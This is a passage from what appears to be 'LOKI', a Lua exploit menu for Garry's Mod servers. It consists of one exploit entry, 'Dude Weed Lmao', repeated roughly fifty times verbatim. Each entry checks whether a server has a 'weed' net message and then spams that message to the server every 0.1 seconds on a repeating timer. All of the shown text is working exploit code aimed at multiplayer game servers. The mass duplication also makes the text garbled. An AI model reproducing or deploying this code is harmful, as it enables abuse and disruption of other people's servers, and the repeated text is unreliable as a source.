  8371. { typ = "func", name = "Big Weed", func = function()
  8372. if !timer.Exists( "loki_bonghit" ) then
  8373. timer.Create( "loki_bonghit", 0.1, 0, function()
  8374. net.Start( "weed" )
  8375. net.WriteString( "DUDE" )
  8376. net.SendToServer()
  8377. end)
  8378. else
  8379. timer.Remove( "loki_bonghit" )
  8380. end
  8381. end, },
  8382. },
  8383. } )
  8384.  
  8385. LOKI.AddExploit( "Dude Weed Lmao", {
  8386. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8387. severity = 1,
  8388. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8389. functions = {
  8390. { typ = "func", name = "Big Weed", func = function()
  8391. if !timer.Exists( "loki_bonghit" ) then
  8392. timer.Create( "loki_bonghit", 0.1, 0, function()
  8393. net.Start( "weed" )
  8394. net.WriteString( "DUDE" )
  8395. net.SendToServer()
  8396. end)
  8397. else
  8398. timer.Remove( "loki_bonghit" )
  8399. end
  8400. end, },
  8401. },
  8402. } )
  8403.  
  8404. LOKI.AddExploit( "Dude Weed Lmao", {
  8405. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8406. severity = 1,
  8407. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8408. functions = {
  8409. { typ = "func", name = "Big Weed", func = function()
  8410. if !timer.Exists( "loki_bonghit" ) then
  8411. timer.Create( "loki_bonghit", 0.1, 0, function()
  8412. net.Start( "weed" )
  8413. net.WriteString( "DUDE" )
  8414. net.SendToServer()
  8415. end)
  8416. else
  8417. timer.Remove( "loki_bonghit" )
  8418. end
  8419. end, },
  8420. },
  8421. } )
  8422.  
  8423. LOKI.AddExploit( "Dude Weed Lmao", {
  8424. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8425. severity = 1,
  8426. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8427. functions = {
  8428. { typ = "func", name = "Big Weed", func = function()
  8429. if !timer.Exists( "loki_bonghit" ) then
  8430. timer.Create( "loki_bonghit", 0.1, 0, function()
  8431. net.Start( "weed" )
  8432. net.WriteString( "DUDE" )
  8433. net.SendToServer()
  8434. end)
  8435. else
  8436. timer.Remove( "loki_bonghit" )
  8437. end
  8438. end, },
  8439. },
  8440. } )
  8441.  
  8442. LOKI.AddExploit( "Dude Weed Lmao", {
  8443. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8444. severity = 1,
  8445. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8446. functions = {
  8447. { typ = "func", name = "Big Weed", func = function()
  8448. if !timer.Exists( "loki_bonghit" ) then
  8449. timer.Create( "loki_bonghit", 0.1, 0, function()
  8450. net.Start( "weed" )
  8451. net.WriteString( "DUDE" )
  8452. net.SendToServer()
  8453. end)
  8454. else
  8455. timer.Remove( "loki_bonghit" )
  8456. end
  8457. end, },
  8458. },
  8459. } )
  8460.  
  8461. LOKI.AddExploit( "Dude Weed Lmao", {
  8462. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8463. severity = 1,
  8464. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8465. functions = {
  8466. { typ = "func", name = "Big Weed", func = function()
  8467. if !timer.Exists( "loki_bonghit" ) then
  8468. timer.Create( "loki_bonghit", 0.1, 0, function()
  8469. net.Start( "weed" )
  8470. net.WriteString( "DUDE" )
  8471. net.SendToServer()
  8472. end)
  8473. else
  8474. timer.Remove( "loki_bonghit" )
  8475. end
  8476. end, },
  8477. },
  8478. } )
  8479.  
  8480. LOKI.AddExploit( "Dude Weed Lmao", {
  8481. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8482. severity = 1,
  8483. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8484. functions = {
  8485. { typ = "func", name = "Big Weed", func = function()
  8486. if !timer.Exists( "loki_bonghit" ) then
  8487. timer.Create( "loki_bonghit", 0.1, 0, function()
  8488. net.Start( "weed" )
  8489. net.WriteString( "DUDE" )
  8490. net.SendToServer()
  8491. end)
  8492. else
  8493. timer.Remove( "loki_bonghit" )
  8494. end
  8495. end, },
  8496. },
  8497. } )
  8498.  
  8499. LOKI.AddExploit( "Dude Weed Lmao", {
  8500. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8501. severity = 1,
  8502. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8503. functions = {
  8504. { typ = "func", name = "Big Weed", func = function()
  8505. if !timer.Exists( "loki_bonghit" ) then
  8506. timer.Create( "loki_bonghit", 0.1, 0, function()
  8507. net.Start( "weed" )
  8508. net.WriteString( "DUDE" )
  8509. net.SendToServer()
  8510. end)
  8511. else
  8512. timer.Remove( "loki_bonghit" )
  8513. end
  8514. end, },
  8515. },
  8516. } )
  8517.  
  8518. LOKI.AddExploit( "Dude Weed Lmao", {
  8519. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8520. severity = 1,
  8521. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8522. functions = {
  8523. { typ = "func", name = "Big Weed", func = function()
  8524. if !timer.Exists( "loki_bonghit" ) then
  8525. timer.Create( "loki_bonghit", 0.1, 0, function()
  8526. net.Start( "weed" )
  8527. net.WriteString( "DUDE" )
  8528. net.SendToServer()
  8529. end)
  8530. else
  8531. timer.Remove( "loki_bonghit" )
  8532. end
  8533. end, },
  8534. },
  8535. } )
  8536.  
  8537. LOKI.AddExploit( "Dude Weed Lmao", {
  8538. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8539. severity = 1,
  8540. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8541. functions = {
  8542. { typ = "func", name = "Big Weed", func = function()
  8543. if !timer.Exists( "loki_bonghit" ) then
  8544. timer.Create( "loki_bonghit", 0.1, 0, function()
  8545. net.Start( "weed" )
  8546. net.WriteString( "DUDE" )
  8547. net.SendToServer()
  8548. end)
  8549. else
  8550. timer.Remove( "loki_bonghit" )
  8551. end
  8552. end, },
  8553. },
  8554. } )
  8555.  
  8556. LOKI.AddExploit( "Dude Weed Lmao", {
  8557. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8558. severity = 1,
  8559. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8560. functions = {
  8561. { typ = "func", name = "Big Weed", func = function()
  8562. if !timer.Exists( "loki_bonghit" ) then
  8563. timer.Create( "loki_bonghit", 0.1, 0, function()
  8564. net.Start( "weed" )
  8565. net.WriteString( "DUDE" )
  8566. net.SendToServer()
  8567. end)
  8568. else
  8569. timer.Remove( "loki_bonghit" )
  8570. end
  8571. end, },
  8572. },
  8573. } )
  8574.  
  8575. LOKI.AddExploit( "Dude Weed Lmao", {
  8576. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8577. severity = 1,
  8578. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8579. functions = {
  8580. { typ = "func", name = "Big Weed", func = function()
  8581. if !timer.Exists( "loki_bonghit" ) then
  8582. timer.Create( "loki_bonghit", 0.1, 0, function()
  8583. net.Start( "weed" )
  8584. net.WriteString( "DUDE" )
  8585. net.SendToServer()
  8586. end)
  8587. else
  8588. timer.Remove( "loki_bonghit" )
  8589. end
  8590. end, },
  8591. },
  8592. } )
  8593.  
  8594. LOKI.AddExploit( "Dude Weed Lmao", {
  8595. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8596. severity = 1,
  8597. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8598. functions = {
  8599. { typ = "func", name = "Big Weed", func = function()
  8600. if !timer.Exists( "loki_bonghit" ) then
  8601. timer.Create( "loki_bonghit", 0.1, 0, function()
  8602. net.Start( "weed" )
  8603. net.WriteString( "DUDE" )
  8604. net.SendToServer()
  8605. end)
  8606. else
  8607. timer.Remove( "loki_bonghit" )
  8608. end
  8609. end, },
  8610. },
  8611. } )
  8612.  
  8613. LOKI.AddExploit( "Dude Weed Lmao", {
  8614. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8615. severity = 1,
  8616. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8617. functions = {
  8618. { typ = "func", name = "Big Weed", func = function()
  8619. if !timer.Exists( "loki_bonghit" ) then
  8620. timer.Create( "loki_bonghit", 0.1, 0, function()
  8621. net.Start( "weed" )
  8622. net.WriteString( "DUDE" )
  8623. net.SendToServer()
  8624. end)
  8625. else
  8626. timer.Remove( "loki_bonghit" )
  8627. end
  8628. end, },
  8629. },
  8630. } )
  8631.  
  8632. LOKI.AddExploit( "Dude Weed Lmao", {
  8633. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8634. severity = 1,
  8635. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8636. functions = {
  8637. { typ = "func", name = "Big Weed", func = function()
  8638. if !timer.Exists( "loki_bonghit" ) then
  8639. timer.Create( "loki_bonghit", 0.1, 0, function()
  8640. net.Start( "weed" )
  8641. net.WriteString( "DUDE" )
  8642. net.SendToServer()
  8643. end)
  8644. else
  8645. timer.Remove( "loki_bonghit" )
  8646. end
  8647. end, },
  8648. },
  8649. } )
  8650.  
  8651. LOKI.AddExploit( "Dude Weed Lmao", {
  8652. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8653. severity = 1,
  8654. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8655. functions = {
  8656. { typ = "func", name = "Big Weed", func = function()
  8657. if !timer.Exists( "loki_bonghit" ) then
  8658. timer.Create( "loki_bonghit", 0.1, 0, function()
  8659. net.Start( "weed" )
  8660. net.WriteString( "DUDE" )
  8661. net.SendToServer()
  8662. end)
  8663. else
  8664. timer.Remove( "loki_bonghit" )
  8665. end
  8666. end, },
  8667. },
  8668. } )
  8669.  
  8670. LOKI.AddExploit( "Dude Weed Lmao", {
  8671. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8672. severity = 1,
  8673. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8674. functions = {
  8675. { typ = "func", name = "Big Weed", func = function()
  8676. if !timer.Exists( "loki_bonghit" ) then
  8677. timer.Create( "loki_bonghit", 0.1, 0, function()
  8678. net.Start( "weed" )
  8679. net.WriteString( "DUDE" )
  8680. net.SendToServer()
  8681. end)
  8682. else
  8683. timer.Remove( "loki_bonghit" )
  8684. end
  8685. end, },
  8686. },
  8687. } )
  8688.  
  8689. LOKI.AddExploit( "Dude Weed Lmao", {
  8690. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8691. severity = 1,
  8692. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8693. functions = {
  8694. { typ = "func", name = "Big Weed", func = function()
  8695. if !timer.Exists( "loki_bonghit" ) then
  8696. timer.Create( "loki_bonghit", 0.1, 0, function()
  8697. net.Start( "weed" )
  8698. net.WriteString( "DUDE" )
  8699. net.SendToServer()
  8700. end)
  8701. else
  8702. timer.Remove( "loki_bonghit" )
  8703. end
  8704. end, },
  8705. },
  8706. } )
  8707.  
  8708. LOKI.AddExploit( "Dude Weed Lmao", {
  8709. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8710. severity = 1,
  8711. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8712. functions = {
  8713. { typ = "func", name = "Big Weed", func = function()
  8714. if !timer.Exists( "loki_bonghit" ) then
  8715. timer.Create( "loki_bonghit", 0.1, 0, function()
  8716. net.Start( "weed" )
  8717. net.WriteString( "DUDE" )
  8718. net.SendToServer()
  8719. end)
  8720. else
  8721. timer.Remove( "loki_bonghit" )
  8722. end
  8723. end, },
  8724. },
  8725. } )
  8726.  
  8727. LOKI.AddExploit( "Dude Weed Lmao", {
  8728. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8729. severity = 1,
  8730. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8731. functions = {
  8732. { typ = "func", name = "Big Weed", func = function()
  8733. if !timer.Exists( "loki_bonghit" ) then
  8734. timer.Create( "loki_bonghit", 0.1, 0, function()
  8735. net.Start( "weed" )
  8736. net.WriteString( "DUDE" )
  8737. net.SendToServer()
  8738. end)
  8739. else
  8740. timer.Remove( "loki_bonghit" )
  8741. end
  8742. end, },
  8743. },
  8744. } )
  8745.  
  8746. LOKI.AddExploit( "Dude Weed Lmao", {
  8747. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8748. severity = 1,
  8749. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8750. functions = {
  8751. { typ = "func", name = "Big Weed", func = function()
  8752. if !timer.Exists( "loki_bonghit" ) then
  8753. timer.Create( "loki_bonghit", 0.1, 0, function()
  8754. net.Start( "weed" )
  8755. net.WriteString( "DUDE" )
  8756. net.SendToServer()
  8757. end)
  8758. else
  8759. timer.Remove( "loki_bonghit" )
  8760. end
  8761. end, },
  8762. },
  8763. } )
  8764.  
  8765. LOKI.AddExploit( "Dude Weed Lmao", {
  8766. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8767. severity = 1,
  8768. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8769. functions = {
  8770. { typ = "func", name = "Big Weed", func = function()
  8771. if !timer.Exists( "loki_bonghit" ) then
  8772. timer.Create( "loki_bonghit", 0.1, 0, function()
  8773. net.Start( "weed" )
  8774. net.WriteString( "DUDE" )
  8775. net.SendToServer()
  8776. end)
  8777. else
  8778. timer.Remove( "loki_bonghit" )
  8779. end
  8780. end, },
  8781. },
  8782. } )
  8783.  
  8784. LOKI.AddExploit( "Dude Weed Lmao", {
  8785. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8786. severity = 1,
  8787. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8788. functions = {
  8789. { typ = "func", name = "Big Weed", func = function()
  8790. if !timer.Exists( "loki_bonghit" ) then
  8791. timer.Create( "loki_bonghit", 0.1, 0, function()
  8792. net.Start( "weed" )
  8793. net.WriteString( "DUDE" )
  8794. net.SendToServer()
  8795. end)
  8796. else
  8797. timer.Remove( "loki_bonghit" )
  8798. end
  8799. end, },
  8800. },
  8801. } )
  8802.  
  8803. LOKI.AddExploit( "Dude Weed Lmao", {
  8804. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8805. severity = 1,
  8806. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8807. functions = {
  8808. { typ = "func", name = "Big Weed", func = function()
  8809. if !timer.Exists( "loki_bonghit" ) then
  8810. timer.Create( "loki_bonghit", 0.1, 0, function()
  8811. net.Start( "weed" )
  8812. net.WriteString( "DUDE" )
  8813. net.SendToServer()
  8814. end)
  8815. else
  8816. timer.Remove( "loki_bonghit" )
  8817. end
  8818. end, },
  8819. },
  8820. } )
  8821.  
  8822. LOKI.AddExploit( "Dude Weed Lmao", {
  8823. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8824. severity = 1,
  8825. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8826. functions = {
  8827. { typ = "func", name = "Big Weed", func = function()
  8828. if !timer.Exists( "loki_bonghit" ) then
  8829. timer.Create( "loki_bonghit", 0.1, 0, function()
  8830. net.Start( "weed" )
  8831. net.WriteString( "DUDE" )
  8832. net.SendToServer()
  8833. end)
  8834. else
  8835. timer.Remove( "loki_bonghit" )
  8836. end
  8837. end, },
  8838. },
  8839. } )
  8840.  
  8841. LOKI.AddExploit( "Dude Weed Lmao", {
  8842. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8843. severity = 1,
  8844. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8845. functions = {
  8846. { typ = "func", name = "Big Weed", func = function()
  8847. if !timer.Exists( "loki_bonghit" ) then
  8848. timer.Create( "loki_bonghit", 0.1, 0, function()
  8849. net.Start( "weed" )
  8850. net.WriteString( "DUDE" )
  8851. net.SendToServer()
  8852. end)
  8853. else
  8854. timer.Remove( "loki_bonghit" )
  8855. end
  8856. end, },
  8857. },
  8858. } )
  8859.  
  8860. LOKI.AddExploit( "Dude Weed Lmao", {
  8861. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8862. severity = 1,
  8863. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8864. functions = {
  8865. { typ = "func", name = "Big Weed", func = function()
  8866. if !timer.Exists( "loki_bonghit" ) then
  8867. timer.Create( "loki_bonghit", 0.1, 0, function()
  8868. net.Start( "weed" )
  8869. net.WriteString( "DUDE" )
  8870. net.SendToServer()
  8871. end)
  8872. else
  8873. timer.Remove( "loki_bonghit" )
  8874. end
  8875. end, },
  8876. },
  8877. } )
  8878.  
  8879. LOKI.AddExploit( "Dude Weed Lmao", {
  8880. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8881. severity = 1,
  8882. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8883. functions = {
  8884. { typ = "func", name = "Big Weed", func = function()
  8885. if !timer.Exists( "loki_bonghit" ) then
  8886. timer.Create( "loki_bonghit", 0.1, 0, function()
  8887. net.Start( "weed" )
  8888. net.WriteString( "DUDE" )
  8889. net.SendToServer()
  8890. end)
  8891. else
  8892. timer.Remove( "loki_bonghit" )
  8893. end
  8894. end, },
  8895. },
  8896. } )
  8897.  
  8898. LOKI.AddExploit( "Dude Weed Lmao", {
  8899. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8900. severity = 1,
  8901. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8902. functions = {
  8903. { typ = "func", name = "Big Weed", func = function()
  8904. if !timer.Exists( "loki_bonghit" ) then
  8905. timer.Create( "loki_bonghit", 0.1, 0, function()
  8906. net.Start( "weed" )
  8907. net.WriteString( "DUDE" )
  8908. net.SendToServer()
  8909. end)
  8910. else
  8911. timer.Remove( "loki_bonghit" )
  8912. end
  8913. end, },
  8914. },
  8915. } )
  8916.  
  8917. LOKI.AddExploit( "Dude Weed Lmao", {
  8918. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8919. severity = 1,
  8920. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8921. functions = {
  8922. { typ = "func", name = "Big Weed", func = function()
  8923. if !timer.Exists( "loki_bonghit" ) then
  8924. timer.Create( "loki_bonghit", 0.1, 0, function()
  8925. net.Start( "weed" )
  8926. net.WriteString( "DUDE" )
  8927. net.SendToServer()
  8928. end)
  8929. else
  8930. timer.Remove( "loki_bonghit" )
  8931. end
  8932. end, },
  8933. },
  8934. } )
  8935.  
  8936. LOKI.AddExploit( "Dude Weed Lmao", {
  8937. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8938. severity = 1,
  8939. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8940. functions = {
  8941. { typ = "func", name = "Big Weed", func = function()
  8942. if !timer.Exists( "loki_bonghit" ) then
  8943. timer.Create( "loki_bonghit", 0.1, 0, function()
  8944. net.Start( "weed" )
  8945. net.WriteString( "DUDE" )
  8946. net.SendToServer()
  8947. end)
  8948. else
  8949. timer.Remove( "loki_bonghit" )
  8950. end
  8951. end, },
  8952. },
  8953. } )
  8954.  
  8955. LOKI.AddExploit( "Dude Weed Lmao", {
  8956. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8957. severity = 1,
  8958. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8959. functions = {
  8960. { typ = "func", name = "Big Weed", func = function()
  8961. if !timer.Exists( "loki_bonghit" ) then
  8962. timer.Create( "loki_bonghit", 0.1, 0, function()
  8963. net.Start( "weed" )
  8964. net.WriteString( "DUDE" )
  8965. net.SendToServer()
  8966. end)
  8967. else
  8968. timer.Remove( "loki_bonghit" )
  8969. end
  8970. end, },
  8971. },
  8972. } )
  8973.  
  8974. LOKI.AddExploit( "Dude Weed Lmao", {
  8975. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8976. severity = 1,
  8977. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8978. functions = {
  8979. { typ = "func", name = "Big Weed", func = function()
  8980. if !timer.Exists( "loki_bonghit" ) then
  8981. timer.Create( "loki_bonghit", 0.1, 0, function()
  8982. net.Start( "weed" )
  8983. net.WriteString( "DUDE" )
  8984. net.SendToServer()
  8985. end)
  8986. else
  8987. timer.Remove( "loki_bonghit" )
  8988. end
  8989. end, },
  8990. },
  8991. } )
  8992.  
  8993. LOKI.AddExploit( "Dude Weed Lmao", {
  8994. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  8995. severity = 1,
  8996. scan = function() return LOKI.ValidNetString( "weed" ) end,
  8997. functions = {
  8998. { typ = "func", name = "Big Weed", func = function()
  8999. if !timer.Exists( "loki_bonghit" ) then
  9000. timer.Create( "loki_bonghit", 0.1, 0, function()
  9001. net.Start( "weed" )
  9002. net.WriteString( "DUDE" )
  9003. net.SendToServer()
  9004. end)
  9005. else
  9006. timer.Remove( "loki_bonghit" )
  9007. end
  9008. end, },
  9009. },
  9010. } )
  9011.  
  9012. LOKI.AddExploit( "Dude Weed Lmao", {
  9013. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9014. severity = 1,
  9015. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9016. functions = {
  9017. { typ = "func", name = "Big Weed", func = function()
  9018. if !timer.Exists( "loki_bonghit" ) then
  9019. timer.Create( "loki_bonghit", 0.1, 0, function()
  9020. net.Start( "weed" )
  9021. net.WriteString( "DUDE" )
  9022. net.SendToServer()
  9023. end)
  9024. else
  9025. timer.Remove( "loki_bonghit" )
  9026. end
  9027. end, },
  9028. },
  9029. } )
  9030.  
  9031. LOKI.AddExploit( "Dude Weed Lmao", {
  9032. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9033. severity = 1,
  9034. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9035. functions = {
  9036. { typ = "func", name = "Big Weed", func = function()
  9037. if !timer.Exists( "loki_bonghit" ) then
  9038. timer.Create( "loki_bonghit", 0.1, 0, function()
  9039. net.Start( "weed" )
  9040. net.WriteString( "DUDE" )
  9041. net.SendToServer()
  9042. end)
  9043. else
  9044. timer.Remove( "loki_bonghit" )
  9045. end
  9046. end, },
  9047. },
  9048. } )
  9049.  
  9050. LOKI.AddExploit( "Dude Weed Lmao", {
  9051. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9052. severity = 1,
  9053. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9054. functions = {
  9055. { typ = "func", name = "Big Weed", func = function()
  9056. if !timer.Exists( "loki_bonghit" ) then
  9057. timer.Create( "loki_bonghit", 0.1, 0, function()
  9058. net.Start( "weed" )
  9059. net.WriteString( "DUDE" )
  9060. net.SendToServer()
  9061. end)
  9062. else
  9063. timer.Remove( "loki_bonghit" )
  9064. end
  9065. end, },
  9066. },
  9067. } )
  9068.  
  9069. LOKI.AddExploit( "Dude Weed Lmao", {
  9070. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9071. severity = 1,
  9072. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9073. functions = {
  9074. { typ = "func", name = "Big Weed", func = function()
  9075. if !timer.Exists( "loki_bonghit" ) then
  9076. timer.Create( "loki_bonghit", 0.1, 0, function()
  9077. net.Start( "weed" )
  9078. net.WriteString( "DUDE" )
  9079. net.SendToServer()
  9080. end)
  9081. else
  9082. timer.Remove( "loki_bonghit" )
  9083. end
  9084. end, },
  9085. },
  9086. } )
  9087.  
  9088. LOKI.AddExploit( "Dude Weed Lmao", {
  9089. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9090. severity = 1,
  9091. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9092. functions = {
  9093. { typ = "func", name = "Big Weed", func = function()
  9094. if !timer.Exists( "loki_bonghit" ) then
  9095. timer.Create( "loki_bonghit", 0.1, 0, function()
  9096. net.Start( "weed" )
  9097. net.WriteString( "DUDE" )
  9098. net.SendToServer()
  9099. end)
  9100. else
  9101. timer.Remove( "loki_bonghit" )
  9102. end
  9103. end, },
  9104. },
  9105. } )
  9106.  
  9107. LOKI.AddExploit( "Dude Weed Lmao", {
  9108. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9109. severity = 1,
  9110. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9111. functions = {
  9112. { typ = "func", name = "Big Weed", func = function()
  9113. if !timer.Exists( "loki_bonghit" ) then
  9114. timer.Create( "loki_bonghit", 0.1, 0, function()
  9115. net.Start( "weed" )
  9116. net.WriteString( "DUDE" )
  9117. net.SendToServer()
  9118. end)
  9119. else
  9120. timer.Remove( "loki_bonghit" )
  9121. end
  9122. end, },
  9123. },
  9124. } )
  9125.  
  9126. LOKI.AddExploit( "Dude Weed Lmao", {
  9127. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9128. severity = 1,
  9129. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9130. functions = {
  9131. { typ = "func", name = "Big Weed", func = function()
  9132. if !timer.Exists( "loki_bonghit" ) then
  9133. timer.Create( "loki_bonghit", 0.1, 0, function()
  9134. net.Start( "weed" )
  9135. net.WriteString( "DUDE" )
  9136. net.SendToServer()
  9137. end)
  9138. else
  9139. timer.Remove( "loki_bonghit" )
  9140. end
  9141. end, },
  9142. },
  9143. } )
  9144.  
  9145. LOKI.AddExploit( "Dude Weed Lmao", {
  9146. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9147. severity = 1,
  9148. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9149. functions = {
  9150. { typ = "func", name = "Big Weed", func = function()
  9151. if !timer.Exists( "loki_bonghit" ) then
  9152. timer.Create( "loki_bonghit", 0.1, 0, function()
  9153. net.Start( "weed" )
  9154. net.WriteString( "DUDE" )
  9155. net.SendToServer()
  9156. end)
  9157. else
  9158. timer.Remove( "loki_bonghit" )
  9159. end
  9160. end, },
  9161. },
  9162. } )
  9163.  
  9164. LOKI.AddExploit( "Dude Weed Lmao", {
  9165. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9166. severity = 1,
  9167. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9168. functions = {
  9169. { typ = "func", name = "Big Weed", func = function()
  9170. if !timer.Exists( "loki_bonghit" ) then
  9171. timer.Create( "loki_bonghit", 0.1, 0, function()
  9172. net.Start( "weed" )
  9173. net.WriteString( "DUDE" )
  9174. net.SendToServer()
  9175. end)
  9176. else
  9177. timer.Remove( "loki_bonghit" )
  9178. end
  9179. end, },
  9180. },
  9181. } )
  9182.  
  9183. LOKI.AddExploit( "Dude Weed Lmao", {
  9184. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9185. severity = 1,
  9186. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9187. functions = {
  9188. { typ = "func", name = "Big Weed", func = function()
  9189. if !timer.Exists( "loki_bonghit" ) then
  9190. timer.Create( "loki_bonghit", 0.1, 0, function()
  9191. net.Start( "weed" )
  9192. net.WriteString( "DUDE" )
  9193. net.SendToServer()
  9194. end)
  9195. else
  9196. timer.Remove( "loki_bonghit" )
  9197. end
  9198. end, },
  9199. },
  9200. } )
  9201.  
  9202. LOKI.AddExploit( "Dude Weed Lmao", {
  9203. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9204. severity = 1,
  9205. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9206. functions = {
  9207. { typ = "func", name = "Big Weed", func = function()
  9208. if !timer.Exists( "loki_bonghit" ) then
  9209. timer.Create( "loki_bonghit", 0.1, 0, function()
  9210. net.Start( "weed" )
  9211. net.WriteString( "DUDE" )
  9212. net.SendToServer()
  9213. end)
  9214. else
  9215. timer.Remove( "loki_bonghit" )
  9216. end
  9217. end, },
  9218. },
  9219. } )
  9220.  
  9221. LOKI.AddExploit( "Dude Weed Lmao", {
  9222. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9223. severity = 1,
  9224. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9225. functions = {
  9226. { typ = "func", name = "Big Weed", func = function()
  9227. if !timer.Exists( "loki_bonghit" ) then
  9228. timer.Create( "loki_bonghit", 0.1, 0, function()
  9229. net.Start( "weed" )
  9230. net.WriteString( "DUDE" )
  9231. net.SendToServer()
  9232. end)
  9233. else
  9234. timer.Remove( "loki_bonghit" )
  9235. end
  9236. end, },
  9237. },
  9238. } )
  9239.  
  9240. LOKI.AddExploit( "Dude Weed Lmao", {
  9241. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9242. severity = 1,
  9243. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9244. functions = {
  9245. { typ = "func", name = "Big Weed", func = function()
  9246. if !timer.Exists( "loki_bonghit" ) then
  9247. timer.Create( "loki_bonghit", 0.1, 0, function()
  9248. net.Start( "weed" )
  9249. net.WriteString( "DUDE" )
  9250. net.SendToServer()
  9251. end)
  9252. else
  9253. timer.Remove( "loki_bonghit" )
  9254. end
  9255. end, },
  9256. },
  9257. } )
  9258.  
  9259. LOKI.AddExploit( "Dude Weed Lmao", {
  9260. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9261. severity = 1,
  9262. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9263. functions = {
  9264. { typ = "func", name = "Big Weed", func = function()
  9265. if !timer.Exists( "loki_bonghit" ) then
  9266. timer.Create( "loki_bonghit", 0.1, 0, function()
  9267. net.Start( "weed" )
  9268. net.WriteString( "DUDE" )
  9269. net.SendToServer()
  9270. end)
  9271. else
  9272. timer.Remove( "loki_bonghit" )
  9273. end
  9274. end, },
  9275. },
  9276. } )
  9277.  
  9278. LOKI.AddExploit( "Dude Weed Lmao", {
  9279. desc = "dude i smoke so much fucking WEED lmao like weed dude",
  9280. severity = 1,
  9281. scan = function() return LOKI.ValidNetString( "weed" ) end,
  9282. functions = {
  9283. { typ = "func", name = "Big Weed", func = function()
  9284. if !timer.Exists( "loki_bonghit" ) then
  9285. timer.Create( "loki_bonghit", 0.1, 0, function()
  9286. net.Start( "weed" )
  9287. net.WriteString( "DUDE" )
  9288. net.SendToServer()
  9289. end)
  9290. else
  9291. timer.Remove( "loki_bonghit" )
  9292. end
  9293. end, },
  9294. },
  9295. } )
  9296.  
